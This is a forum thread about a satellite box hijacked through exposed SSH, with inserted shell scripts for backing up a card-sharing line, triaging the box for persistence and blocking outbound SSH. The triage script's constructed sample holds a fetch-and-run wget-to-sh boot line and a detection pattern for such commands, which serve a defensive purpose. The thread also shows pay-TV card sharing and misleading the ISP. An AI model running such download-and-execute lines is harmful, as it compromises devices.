Help - Box has been hacked.

JW_1822

Hi,

First time posting on here but I thought it was a good place to start.

I had to move my router from near my box the other week and borrowed a USB Wi-Fi dongle from an old PC, which worked a treat.

Unfortunately, fast-forward a week or so and I have had my broadband disconnected because I have apparently been trying to access private networks over SSH...

On further inspection, it dawned on me that the last time I had used that Wi-Fi dongle I had set up SSH (and other) port forwarding on my router, so when I moved it to my box I had inadvertently exposed it to the fun that is the open internet, and some charming person seems to have hacked into my box and been using it for all sorts of fun as part of a little botnet or something...

Of course I have to take a significant amount of the blame here for my oversight, but now I have a box which I can't plug into my network until I am sure it's nice and clean and isn't going to start being naughty again...

Has anyone ever seen this before, and does anyone have any advice on how best to proceed?

If the only option is to wipe the box, would anyone be able to point me in the right direction of what I should note down, copy over or otherwise back up so that I get back to where I was, minus any nasties which may have been installed.

I'm fairly literate with PCs, Linux etc., so I should be able to find my way around the process, especially with some of the guides on here, but as it stands I am a beginner with these boxes, as unfortunately the box was set up by someone else who I can't get hold of to help.

Not sure what you would need to know, but it's a Zgemma 2S which seems to have "Virtuosso Image Xtreme" on it.

For anyone reading this who can't help: at least take a lesson from my stupidity and make sure your box is behind your firewall at all times.

Thanks!
 
Have you had your internet reconnected?
I think your easiest route would be to back up your line and reflash your box, as it will be pretty much impossible to know exactly what has been altered.
To back up your line you will need to access it via FTP from a PC and copy it over to your computer (make sure you disconnect your router from the internet, or at least undo whatever you changed to make it so insecure in the first place).
The line lives in the "etc" folder on OpenViX, assuming you are using CCcam, and will be called CCcam.cfg.
If you're using mgcamd it could be either "etc" or usr/keys and will be called newline.line (not sure exactly which folder ViX stores the mgcamd line file in, as I have never used ViX, but it will be one of the two).
Once you have the line file backed up, install a new build from the stickies at the top of this forum and add your line back on.
 
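The backup step in the reply above, as an added example that is not part of the original post: a small POSIX shell script that pulls each candidate line file off the box over FTP (with the router's WAN side unplugged, as the reply says), classifies it as a CCcam or mgcamd line, and checks the entry has all its fields so a truncated copy is noticed before the box is wiped. Everything here is assumed rather than taken from the thread: that the box answers FTP on the LAN, the host/user/password placeholders, and the field counts (5 for a `C:` line, 5 plus 14 DES key bytes for an `N:` line). The sample CCcam.cfg and newline.line are constructed and contain no real credentials.

```shell
#!/bin/sh
# Added example, not from the thread: copy the card-sharing "line" off an
# Enigma2 box over the LAN (router WAN unplugged) and sanity-check it before
# reflashing. Assumptions: the box answers FTP on the LAN, and the host, user
# and password arguments are placeholders for your own values.

# The files the reply above names for CCcam and mgcamd lines (relative to /).
CANDIDATE_LINE_FILES="etc/CCcam.cfg etc/newline.line usr/keys/newline.line"

# fetch_file HOST USER PASS REMOTE_PATH LOCAL_PATH
# One FTP download; non-zero exit when the remote file is missing (curl -f).
fetch_file() {
    curl -sS -f -u "$2:$3" "ftp://$1/$4" -o "$5"
}

# line_type FILE -> cccam | mgcamd | unknown
# Skips comments and "SERVER LISTEN PORT" style settings and looks at the first
# real entry: CCcam client lines start "C: host port user pass", mgcamd
# newline.line entries "N: host port user pass" followed by 14 DES key bytes.
line_type() {
    first=$(awk '{ sub(/^[ \t]+/, ""); if ($0 ~ /^[CN]:/) { print; exit } }' "$1")
    case "$first" in
        C:*) echo cccam ;;
        N:*) echo mgcamd ;;
        *)   echo unknown ;;
    esac
}

# line_complete FILE -> exit 0 if the first entry has all the fields its type
# needs (5 for a C line, 19 for an N line), so a truncated copy is caught.
line_complete() {
    n=$(awk '{ sub(/^[ \t]+/, ""); if ($0 ~ /^[CN]:/) { print NF; exit } }' "$1")
    case "$(line_type "$1")" in
        cccam)  [ "${n:-0}" -ge 5 ] ;;
        mgcamd) [ "${n:-0}" -ge 19 ] ;;
        *)      return 1 ;;
    esac
}

# backup_line HOST USER PASS DEST_DIR
# Tries every candidate path, keeps what exists and prints "<type> <status> <file>"
# per hit; fails if nothing was found, so you cannot flash with an empty backup.
backup_line() {
    dest=$4
    mkdir -p "$dest"
    found=0
    for rel in $CANDIDATE_LINE_FILES; do
        out="$dest/$(echo "$rel" | tr / _)"
        if fetch_file "$1" "$2" "$3" "$rel" "$out" 2>/dev/null; then
            found=$((found + 1))
            if line_complete "$out"; then status=ok; else status=INCOMPLETE; fi
            echo "$(line_type "$out") $status $out"
        fi
    done
    [ "$found" -gt 0 ]
}

# make_sample_box DIR: constructed stand-in for a box's filesystem (made-up
# server name and credentials, not a real line) for trying the checks offline.
make_sample_box() {
    mkdir -p "$1/etc" "$1/usr/keys"
    printf 'SERVER LISTEN PORT : 12000\n# my line\nC: cs.example.net 12000 user1 pass1\n' > "$1/etc/CCcam.cfg"
    printf 'N: cs.example.net 34000 user1 pass1 01 02 03 04 05 06 07 08 09 10 11 12 13 14\n' > "$1/usr/keys/newline.line"
}

# Real use, on a PC on the same LAN as the box:
#   backup_line 192.168.1.10 root "" "$HOME/zgemma-backup"
```

Only flash once every line printed shows `ok`; an `INCOMPLETE` or `unknown` result means the copy is not usable and should be re-fetched. The backed-up file holds the sharing credentials, so keep it somewhere sensible rather than in a shared download folder.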
The only important thing on your box is the line. If you have that safely on your pc then great. If you don't, you need to copy the line from your box to somewhere safe.

Have you closed the router ports now? That needs doing.

Then just reflash your box with your chosen image, or go for Kiddac's bare bones setup.

DO NOT backup your settings as you don't know what your box is doing or what has been edited. Just flash it and wave goodbye to your series links.

Also, check the USB storage device in the box for anything that doesn't look right, or say sod it, let's initialise it and start from scratch. Wave bye-bye to recordings.
 
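The "check the USB storage device for anything that doesn't look right" step in the post above, as an added example that is not from the original post: a POSIX shell triage script meant to be run on a PC against the mounted stick or an FTP copy of the box's root filesystem, never on the box itself (its own `ls`, `ps` and `find` cannot be trusted once it has been owned). It reports the places a bot typically leaves persistence on a small Linux box: planted SSH `authorized_keys`, cron entries, executables in scratch directories, boot scripts that download and run something, and hidden directories near the top of the stick. The mount point and all planted sample artefacts are assumptions and constructed data, not anything observed on this user's box.

```shell
#!/bin/sh
# Added example, not from the thread: offline triage of the box's storage,
# e.g. the USB stick (or an FTP copy of the root filesystem) mounted on a PC.
# It only reports; the advice above stands regardless of what it finds: reflash.
# Usage: triage_fs /mnt/usbstick    (mount point is an assumption)

# triage_fs ROOT -> one "TAG path: detail" line per suspicious item, nothing if clean
triage_fs() {
    root=${1%/}

    # 1. SSH keys planted so the attacker can get back in after a password change
    for f in "$root"/root/.ssh/authorized_keys "$root"/home/*/.ssh/authorized_keys; do
        [ -f "$f" ] && echo "SSHKEY $f: $(grep -c -E '^(ssh-|ecdsa-)' "$f") key(s)"
    done

    # 2. cron persistence: every non-comment entry is worth reading
    for f in "$root"/etc/crontab "$root"/etc/cron.d/* "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/*; do
        [ -f "$f" ] || continue
        grep -v -E '^[[:space:]]*#' "$f" | grep -v -E '^[[:space:]]*$' | while IFS= read -r line; do
            echo "CRON $f: $line"
        done
    done

    # 3. executables in world-writable scratch dirs, where dropped payloads usually land
    for d in "$root"/tmp "$root"/var/tmp "$root"/dev/shm; do
        [ -d "$d" ] && find "$d" -type f -perm -100 | sed 's/^/TMPEXEC /; s/$/: executable in scratch dir/'
    done

    # 4. boot scripts that fetch something or run it out of a scratch dir
    for f in "$root"/etc/rc.local "$root"/etc/init.d/* "$root"/etc/rc*.d/*; do
        [ -f "$f" ] || continue
        grep -n -E '(wget|curl|/tmp/|/dev/shm/|base64 -d)' "$f" | while IFS= read -r hit; do
            echo "BOOT $f: $hit"
        done
    done

    # 5. hidden directories near the top of the tree (recording dirs are never hidden)
    find "$root" -maxdepth 3 -type d -name '.*' ! -name '.ssh' | sed 's/^/HIDDEN /; s/$/: hidden directory/'
}

# make_sample_root DIR: constructed tree with planted artefacts (harmless stand-ins,
# not real malware) so triage_fs can be exercised offline; every value is made up.
make_sample_root() {
    mkdir -p "$1/root/.ssh" "$1/etc/cron.d" "$1/tmp" "$1/usr/bin" "$1/media/hdd/.x"
    printf 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC7 bot@example\n' > "$1/root/.ssh/authorized_keys"
    printf '# looks harmless\n*/5 * * * * root /tmp/.s/run\n' > "$1/etc/cron.d/update"
    printf '#!/bin/sh\nexit 0\n' > "$1/tmp/x" && chmod 755 "$1/tmp/x"
    printf '#!/bin/sh\nwget -q http://192.0.2.5/b -O /tmp/b && sh /tmp/b\nexit 0\n' > "$1/etc/rc.local"
    printf '#!/bin/sh\necho clean\n' > "$1/usr/bin/clean" && chmod 755 "$1/usr/bin/clean"
}

# Try it on the constructed tree:
#   d=$(mktemp -d); make_sample_root "$d"; triage_fs "$d"
```

A clean report is not proof the box is clean (a replaced binary in /usr/bin would not show up here), which is why the posts above say to reflash either way; the value of the triage is knowing what the attacker left, for instance whether a key was planted, before the evidence is wiped.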
Hi Guys,

Thanks for the quick replies!

Yes, I thought wiping and starting from scratch would probably be the best idea; there's nothing that important saved anyway, fortunately.

Thanks for confirming the only important bits to copy over, though. I'll be much more comfortable doing this now, as I was worrying that once I had reflashed it, I'd find that I should have copied another critical file over.

All ports are firmly closed now. A very stupid mistake, this one, but it does make you realise how quickly they can find an insecure device, get into it and start causing trouble!

Cheers!
 
Yes, had it reconnected now fortunately.

I just explained what I'd done, but said it was another PC which I had put the Wi-Fi dongle into.

Before reconnecting me they wanted me to confirm I had either run security scans on all my devices or wiped them because once they have access to one device behind the firewall they can obviously access any other device within your network quite easily. You don't realise how many internet capable devices you have until you have to list them all!

The box is currently disconnected, but I had a couple of other Raspberry Pi servers doing odd bits and pieces which I'll just wipe and rebuild. We also have a couple of laptops which I've run scans on, but nothing has turned up. The mobiles which connect to the Wi-Fi I don't think are too much of a risk... and I also have a Roku box, but I don't know if that's vulnerable at all and wouldn't know where to start if it was.

As a precaution, I've blocked all SSH outgoing connections on my router now and made it log any attempts, so at least I can see if there is anything within my network trying to connect to anything over SSH and deal with it before it causes a problem.

When I first called up to see why the internet wasn't working, they read me a pre-prepared statement along the lines of "You have had your services suspended due to an ongoing investigation into a breach of policy".

To say I was a little worried at that point was an understatement!
 
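The "block all outgoing SSH on the router and log any attempts" control described in the post above, as an added example that is not part of the original post: iptables rules for a Linux-based router (OpenWrt style) that log and reject new LAN-to-WAN connections to TCP/22, plus a small report that reads the resulting kernel log lines and ranks internal devices by how often they tried, so the device that is still misbehaving is at the top. The interface names, chain name, log prefix and the sample log lines are all assumptions and constructed data (documentation address ranges), not anything from this user's router.

```shell
#!/bin/sh
# Added example, not from the thread: the "block outgoing SSH at the router and
# log attempts" idea from the post above, for a Linux/iptables router (OpenWrt
# style). Interface names, the chain name and the log prefix are assumptions.
LAN_IF=br-lan      # assumption: the router's LAN bridge
WAN_IF=eth0        # assumption: the router's WAN interface
PREFIX="SSH-EGRESS "

# ssh_egress_rules -> prints the iptables commands (run as root on the router).
# Only new TCP/22 connections from LAN to WAN are touched, so SSH between
# machines inside the LAN keeps working; the LOG rule is rate-limited so a
# chatty bot cannot fill the log, then the connection is rejected. The -D
# before -I makes re-running the script safe (no duplicate FORWARD rules).
ssh_egress_rules() {
    cat <<EOF
iptables -N SSH_EGRESS 2>/dev/null || iptables -F SSH_EGRESS
iptables -A SSH_EGRESS -m limit --limit 6/min --limit-burst 10 -j LOG --log-prefix "$PREFIX" --log-level 4
iptables -A SSH_EGRESS -j REJECT --reject-with tcp-reset
iptables -D FORWARD -i $LAN_IF -o $WAN_IF -p tcp --dport 22 --syn -j SSH_EGRESS 2>/dev/null
iptables -I FORWARD -i $LAN_IF -o $WAN_IF -p tcp --dport 22 --syn -j SSH_EGRESS
EOF
}

# ssh_egress_report < kernel-log -> "count src dst" lines, busiest first,
# so the device that keeps trying to reach out is the first line.
ssh_egress_report() {
    grep -F "$PREFIX" \
    | sed -n 's/.*SRC=\([0-9.]*\) DST=\([0-9.]*\).*/\1 \2/p' \
    | sort | uniq -c | sort -rn \
    | awk '{ print $1, $2, $3 }'
}

# Constructed sample of what the LOG target writes (addresses from the
# documentation ranges, not real traffic) for trying the report offline.
SAMPLE_LOG='Mar 10 21:03:11 router kernel: SSH-EGRESS IN=br-lan OUT=eth0 SRC=192.168.1.50 DST=203.0.113.10 LEN=60 PROTO=TCP SPT=41234 DPT=22 SYN
Mar 10 21:03:12 router kernel: SSH-EGRESS IN=br-lan OUT=eth0 SRC=192.168.1.50 DST=203.0.113.11 LEN=60 PROTO=TCP SPT=41235 DPT=22 SYN
Mar 10 21:03:13 router kernel: SSH-EGRESS IN=br-lan OUT=eth0 SRC=192.168.1.50 DST=203.0.113.10 LEN=60 PROTO=TCP SPT=41236 DPT=22 SYN
Mar 10 21:04:00 router kernel: SSH-EGRESS IN=br-lan OUT=eth0 SRC=192.168.1.20 DST=198.51.100.7 LEN=60 PROTO=TCP SPT=50001 DPT=22 SYN
Mar 10 21:04:01 router dropbear[123]: Child connection from 192.168.1.20:50002'

# On the router:   ssh_egress_rules | sh        later:   logread | ssh_egress_report
# Offline trial:   printf '%s\n' "$SAMPLE_LOG" | ssh_egress_report
```

Blocking only port 22 catches a bot that uses the standard SSH port, which is what got this box noticed; a bot scanning on other ports would not show up here, so treat the log as one signal alongside the wipe-and-rebuild the posts above recommend, not as a substitute for it.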
All he has to say is that it was without his knowledge and that it won't happen again, as he has protection now (assuming you do, now).

Just connect your box to your router but remove the internet cable going into it (or disable internet access in the settings).
Connect to your box over LAN and transfer any keys you need.

Then just reflash to be sure. And then transfer back your key.
 